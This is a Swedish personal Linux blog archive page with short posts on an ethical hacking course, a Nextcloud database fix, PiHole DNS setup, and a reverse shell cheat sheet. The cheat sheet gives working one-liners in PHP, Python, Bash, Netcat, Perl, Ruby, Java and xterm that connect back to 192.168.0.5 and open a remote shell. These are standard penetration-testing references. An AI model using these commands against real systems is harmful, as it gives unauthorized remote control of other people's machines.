Kategori: Linux (Sida 3 av 31)

Ethical Hacking

8 maj, 2019 / Jörgen / Inga kommentarer

I samband med min kurs i Ethical Hacking fick jag fr?gan om jag vill ber?tta om den, nedan kan du se vad jag tyckte.

Jag kan varmt rekommendera KTH’s distanskurs i Ethical Hacking (7.5hp), mycket bra kurs om du har intresse och vill f? en bra grund att bygga vidare p?, eller om du bara vill veta mer s? att du kan s?kra upp ditt online-liv.

H?r finns information om kursen: https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp

L?nk till artikeln

https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp/students/to-win-over-the-hacks-you-have-to-think-like-the-hacker-1.824598

Och som PDF

To win over the hacks, you have to think like the hacker_ _ KTH

1071 Specified key was too long; max key length is 767 bytes

15 april, 2019 / Jörgen / Inga kommentarer

Har du f?tt felmeddelandet ” 1071 Specified key was too long; max key length is 767 bytes ” i din Nextcloud? Superenkelt att fixa!

$ sudo mysql -u root -p
 MariaDB [(none)]> use nextcloud;
 MariaDB [nextcloud]> set global innodb_large_prefix=on;
 MariaDB [nextcloud]> set global innodb_file_format=Barracuda;
$ sudo -u www-data php occ maintenance:repair

K?lla

Reverse shell

11 mars, 2019 / Jörgen / Inga kommentarer

B?rja med att skriva det h?r lokalt: nc -l -p 4444 -vvv

Och p? remote sidan g?r du n?gon av dessa

Php :

php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash :

bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat :

nc -e /bin/sh 192.168.0.5 4444

Perl :

perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby :

ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java :

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm :

xterm -display 192.168.0.5:4444

Source https://github.com/ismailtasdelen/reverse-shell-cheatsheet

PiHole och Asus RT-N66U

12 oktober, 2018 / Jörgen / Inga kommentarer

Om har t?nkt till och beslutat dig f?r att k?ra PiHole p? ditt n?t s? kan jag bara s?ga grattis.

N?r du har satt upp allt efter konstens alla regler, dvs. st?ngt av DHCP i routern och st?llt in allt i din PiHole (RPI eller Virtuell) s? kom d? ih?g att SSH:a in till routern och editera /etc/dnsmasq.conf. L?gg till

dhcp-option=6,192.168.1.3

OBS! Adressen ovan (192.168.1.3) ?ndrar du till den IP du gett till din egna PiHole

N?r du sedan startat om s? kommer *all* trafik att g? via PiHole och du kommer ?ven att se alla hostar som passerar via den. Du kommer helt enkelt att f? b?ttre koll.

Det ?r f?r ?vrigt alternativ 2 i den h?r beskrivningen https://discourse.pi-hole.net/t/how-do-i-configure-my-devices-to-use-pi-hole-as-their-dns-server/245